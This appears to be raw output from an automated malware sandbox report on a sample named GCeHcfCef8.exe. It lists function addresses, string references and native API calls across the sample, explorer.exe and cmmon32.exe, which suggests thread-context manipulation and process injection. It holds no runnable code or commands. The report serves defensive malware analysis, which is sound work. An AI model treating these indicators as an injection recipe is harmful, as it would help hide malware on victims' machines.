Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 0_2_05696A48	0_2_05696A48
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 0_2_05690040	0_2_05690040
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 0_2_05690006	0_2_05690006
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 0_2_05696A38	0_2_05696A38
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 0_2_0BF35A28	0_2_0BF35A28
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 0_2_0BF35598	0_2_0BF35598
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 0_2_0BF34B90	0_2_0BF34B90
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 0_2_0BF34B81	0_2_0BF34B81
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 0_2_0BF30040	0_2_0BF30040
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 0_2_0BF30006	0_2_0BF30006
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 0_2_0BF345E0	0_2_0BF345E0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 0_2_0BF345CF	0_2_0BF345CF
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 0_2_0BF35A17	0_2_0BF35A17
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 0_2_0BF3F088	0_2_0BF3F088
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 0_2_0BF35588	0_2_0BF35588
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0041E00E	2_2_0041E00E
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0041E81A	2_2_0041E81A
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0041E10A	2_2_0041E10A
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0041E2B4	2_2_0041E2B4
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0041DBD9	2_2_0041DBD9
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0041E4DB	2_2_0041E4DB
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_00402D88	2_2_00402D88
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_00409E60	2_2_00409E60
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0041DE78	2_2_0041DE78
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01778158	2_2_01778158
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178A118	2_2_0178A118
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E0100	2_2_016E0100
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017A81CC	2_2_017A81CC
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017B01AA	2_2_017B01AA
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017A41A2	2_2_017A41A2
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01782000	2_2_01782000
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017AA352	2_2_017AA352
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017B03E6	2_2_017B03E6
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016FE3F0	2_2_016FE3F0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01790274	2_2_01790274
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017702C0	2_2_017702C0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F0535	2_2_016F0535
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017B0591	2_2_017B0591
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017A2446	2_2_017A2446
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01794420	2_2_01794420
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0179E4F6	2_2_0179E4F6
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F0770	2_2_016F0770
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01714750	2_2_01714750
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016EC7C0	2_2_016EC7C0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0170C6E0	2_2_0170C6E0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01706962	2_2_01706962
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F29A0	2_2_016F29A0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017BA9A6	2_2_017BA9A6
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F2840	2_2_016F2840
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016FA840	2_2_016FA840
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171E8F0	2_2_0171E8F0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016D68B8	2_2_016D68B8
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017AAB40	2_2_017AAB40
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017A6BD7	2_2_017A6BD7
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016EEA80	2_2_016EEA80
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178CD1F	2_2_0178CD1F
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016FAD00	2_2_016FAD00
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016EADE0	2_2_016EADE0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01708DBF	2_2_01708DBF
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F0C00	2_2_016F0C00
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E0CF2	2_2_016E0CF2
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01790CB5	2_2_01790CB5
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01764F40	2_2_01764F40
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01710F30	2_2_01710F30
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01792F30	2_2_01792F30
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01732F28	2_2_01732F28
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016FCFE0	2_2_016FCFE0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E2FC8	2_2_016E2FC8
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0176EFA0	2_2_0176EFA0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F0E59	2_2_016F0E59
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017AEE26	2_2_017AEE26
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017AEEDB	2_2_017AEEDB
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01702E90	2_2_01702E90
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017ACE93	2_2_017ACE93
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017BB16B	2_2_017BB16B
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0172516C	2_2_0172516C
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016DF172	2_2_016DF172
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016FB1B0	2_2_016FB1B0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017A70E9	2_2_017A70E9
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017AF0E0	2_2_017AF0E0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F70C0	2_2_016F70C0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0179F0CC	2_2_0179F0CC
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016DD34C	2_2_016DD34C
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017A132D	2_2_017A132D
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0173739A	2_2_0173739A
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017912ED	2_2_017912ED
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0170B2C0	2_2_0170B2C0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F52A0	2_2_016F52A0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017A7571	2_2_017A7571
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178D5B0	2_2_0178D5B0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E1460	2_2_016E1460
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017AF43F	2_2_017AF43F
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017AF7B0	2_2_017AF7B0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017A16CC	2_2_017A16CC
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0170B950	2_2_0170B950
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F9950	2_2_016F9950
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01785910	2_2_01785910
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175D800	2_2_0175D800
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F38E0	2_2_016F38E0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017AFB76	2_2_017AFB76
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01765BF0	2_2_01765BF0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0172DBF9	2_2_0172DBF9
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0170FB80	2_2_0170FB80
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01763A6C	2_2_01763A6C
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017AFA49	2_2_017AFA49
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017A7A46	2_2_017A7A46
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0179DAC6	2_2_0179DAC6
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01735AA0	2_2_01735AA0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178DAAC	2_2_0178DAAC
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01791AA3	2_2_01791AA3
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017A7D73	2_2_017A7D73
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017A1D5A	2_2_017A1D5A
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F3D40	2_2_016F3D40
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0170FDC0	2_2_0170FDC0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01769C32	2_2_01769C32
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017AFCF2	2_2_017AFCF2
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017AFF09	2_2_017AFF09
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017AFFB1	2_2_017AFFB1
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F1F92	2_2_016F1F92
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F9EB0	2_2_016F9EB0
Source: C:\Windows\explorer.exe	Code function: 3_2_102CC036	3_2_102CC036
Source: C:\Windows\explorer.exe	Code function: 3_2_102C3082	3_2_102C3082
Source: C:\Windows\explorer.exe	Code function: 3_2_102C4D02	3_2_102C4D02
Source: C:\Windows\explorer.exe	Code function: 3_2_102CA912	3_2_102CA912
Source: C:\Windows\explorer.exe	Code function: 3_2_102D05CD	3_2_102D05CD
Source: C:\Windows\explorer.exe	Code function: 3_2_102CD232	3_2_102CD232
Source: C:\Windows\explorer.exe	Code function: 3_2_102C7B30	3_2_102C7B30
Source: C:\Windows\explorer.exe	Code function: 3_2_102C7B32	3_2_102C7B32
Source: C:\Windows\explorer.exe	Code function: 3_2_10E29232	3_2_10E29232
Source: C:\Windows\explorer.exe	Code function: 3_2_10E1F082	3_2_10E1F082
Source: C:\Windows\explorer.exe	Code function: 3_2_10E28036	3_2_10E28036
Source: C:\Windows\explorer.exe	Code function: 3_2_10E2C5CD	3_2_10E2C5CD
Source: C:\Windows\explorer.exe	Code function: 3_2_10E23B32	3_2_10E23B32
Source: C:\Windows\explorer.exe	Code function: 3_2_10E23B30	3_2_10E23B30
Source: C:\Windows\explorer.exe	Code function: 3_2_10E20D02	3_2_10E20D02
Source: C:\Windows\explorer.exe	Code function: 3_2_10E26912	3_2_10E26912
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04462446	4_2_04462446
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04454420	4_2_04454420
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0445E4F6	4_2_0445E4F6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043B0535	4_2_043B0535
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04470591	4_2_04470591
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043CC6E0	4_2_043CC6E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043B0770	4_2_043B0770
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043D4750	4_2_043D4750
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043AC7C0	4_2_043AC7C0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04442000	4_2_04442000
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04438158	4_2_04438158
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043A0100	4_2_043A0100
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0444A118	4_2_0444A118
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_044681CC	4_2_044681CC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_044641A2	4_2_044641A2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_044701AA	4_2_044701AA
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04450274	4_2_04450274
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_044302C0	4_2_044302C0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0446A352	4_2_0446A352
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_044703E6	4_2_044703E6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043BE3F0	4_2_043BE3F0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043B0C00	4_2_043B0C00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043A0CF2	4_2_043A0CF2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04450CB5	4_2_04450CB5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043BAD00	4_2_043BAD00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0444CD1F	4_2_0444CD1F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043C8DBF	4_2_043C8DBF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043AADE0	4_2_043AADE0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0446EE26	4_2_0446EE26
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043B0E59	4_2_043B0E59
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0446EEDB	4_2_0446EEDB
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043C2E90	4_2_043C2E90
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0446CE93	4_2_0446CE93
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04424F40	4_2_04424F40
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043D0F30	4_2_043D0F30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043F2F28	4_2_043F2F28
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04452F30	4_2_04452F30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043BCFE0	4_2_043BCFE0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0442EFA0	4_2_0442EFA0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043A2FC8	4_2_043A2FC8
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043B2840	4_2_043B2840
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043BA840	4_2_043BA840
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043968B8	4_2_043968B8
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043DE8F0	4_2_043DE8F0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043C6962	4_2_043C6962
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043B29A0	4_2_043B29A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0447A9A6	4_2_0447A9A6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043AEA80	4_2_043AEA80
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0446AB40	4_2_0446AB40
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04466BD7	4_2_04466BD7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043A1460	4_2_043A1460
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0446F43F	4_2_0446F43F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04467571	4_2_04467571
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_044795C3	4_2_044795C3
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0444D5B0	4_2_0444D5B0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043F5630	4_2_043F5630
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_044616CC	4_2_044616CC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0446F7B0	4_2_0446F7B0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0445F0CC	4_2_0445F0CC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0446F0E0	4_2_0446F0E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_044670E9	4_2_044670E9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043B70C0	4_2_043B70C0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0447B16B	4_2_0447B16B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0439F172	4_2_0439F172
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043E516C	4_2_043E516C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043BB1B0	4_2_043BB1B0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043B52A0	4_2_043B52A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_044512ED	4_2_044512ED
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043CB2C0	4_2_043CB2C0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0446132D	4_2_0446132D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0439D34C	4_2_0439D34C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043F739A	4_2_043F739A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04429C32	4_2_04429C32
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0446FCF2	4_2_0446FCF2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04461D5A	4_2_04461D5A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04467D73	4_2_04467D73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043B3D40	4_2_043B3D40
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043CFDC0	4_2_043CFDC0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043B9EB0	4_2_043B9EB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0446FF09	4_2_0446FF09
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043B1F92	4_2_043B1F92
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04373FD5	4_2_04373FD5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04373FD2	4_2_04373FD2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0446FFB1	4_2_0446FFB1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0441D800	4_2_0441D800
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043B38E0	4_2_043B38E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04445910	4_2_04445910
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043B9950	4_2_043B9950
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043CB950	4_2_043CB950
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04467A46	4_2_04467A46
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0446FA49	4_2_0446FA49
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04423A6C	4_2_04423A6C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0445DAC6	4_2_0445DAC6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043F5AA0	4_2_043F5AA0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04451AA3	4_2_04451AA3
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0444DAAC	4_2_0444DAAC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0446FB76	4_2_0446FB76
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_04425BF0	4_2_04425BF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043CFB80	4_2_043CFB80
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_043EDBF9	4_2_043EDBF9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0041E10A	4_2_0041E10A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0041E4D9	4_2_0041E4D9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_0041E81A	4_2_0041E81A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_00402D88	4_2_00402D88
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_00402D90	4_2_00402D90
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_00402FB0	4_2_00402FB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4_2_00409E60	4_2_00409E60

Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: String function: 016DB970 appears 280 times
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: String function: 01737E54 appears 102 times
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: String function: 0176F290 appears 105 times
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: String function: 01725130 appears 58 times
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: String function: 0175EA12 appears 86 times
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: String function: 0441EA12 appears 86 times
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: String function: 043E5130 appears 58 times
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: String function: 0442F290 appears 105 times
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: String function: 043F7E54 appears 111 times
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: String function: 0439B970 appears 280 times

Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0041A360 NtCreateFile,	2_2_0041A360
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0041A410 NtReadFile,	2_2_0041A410
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0041A490 NtClose,	2_2_0041A490
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0041A540 NtAllocateVirtualMemory,	2_2_0041A540
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0041A40A NtReadFile,	2_2_0041A40A
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0041A48A NtClose,	2_2_0041A48A
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0041A53A NtAllocateVirtualMemory,	2_2_0041A53A
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722B60 NtClose,LdrInitializeThunk,	2_2_01722B60
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_01722BF0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722AD0 NtReadFile,LdrInitializeThunk,	2_2_01722AD0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722D30 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_01722D30
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722D10 NtMapViewOfSection,LdrInitializeThunk,	2_2_01722D10
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01722DF0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722DD0 NtDelayExecution,LdrInitializeThunk,	2_2_01722DD0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_01722C70
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722CA0 NtQueryInformationToken,LdrInitializeThunk,	2_2_01722CA0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722F30 NtCreateSection,LdrInitializeThunk,	2_2_01722F30
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722FE0 NtCreateFile,LdrInitializeThunk,	2_2_01722FE0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722FB0 NtResumeThread,LdrInitializeThunk,	2_2_01722FB0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722F90 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_01722F90
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_01722EA0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722E80 NtReadVirtualMemory,LdrInitializeThunk,	2_2_01722E80
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01724340 NtSetContextThread,	2_2_01724340
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01724650 NtSuspendThread,	2_2_01724650
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722BE0 NtQueryValueKey,	2_2_01722BE0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722BA0 NtEnumerateValueKey,	2_2_01722BA0
